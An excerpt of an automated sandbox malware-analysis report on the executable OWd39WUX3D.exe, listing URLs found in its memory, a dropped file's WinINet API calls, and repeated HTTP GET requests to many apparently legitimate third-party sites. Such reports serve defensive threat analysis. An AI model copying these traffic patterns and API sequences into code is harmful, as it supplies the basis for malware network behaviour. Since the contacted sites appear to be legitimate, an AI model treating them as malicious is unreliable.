              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/xmlrpc.php?rsd
              Source: OWd39WUX3D.exe, 00000000.00000003.482754637.0000000006B8B000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557996648.0000000003B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.sbc.si/o-sbc/organizacija
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajerskagz.si/o-sgz-2/
              Source: OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389112777.0000000007730000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajum.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tecos.si/index.php/sl/o-podjetju/predstavitev
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zdruzenje-manager.si/sl/o-zdruzenju/o-zdruzenju/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zds.si/sl/o-zds/predstavitev/
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.602638965.0000000003C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
              Source: unknownDNS traffic detected: queries for: www.dgmna.com
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D1840 InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,wnsprintfA,HttpAddRequestHeadersA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,HttpQueryInfoA,VirtualAlloc,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_005D1840
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.clinicasanluis.com.co
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
              Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
              Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
              Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
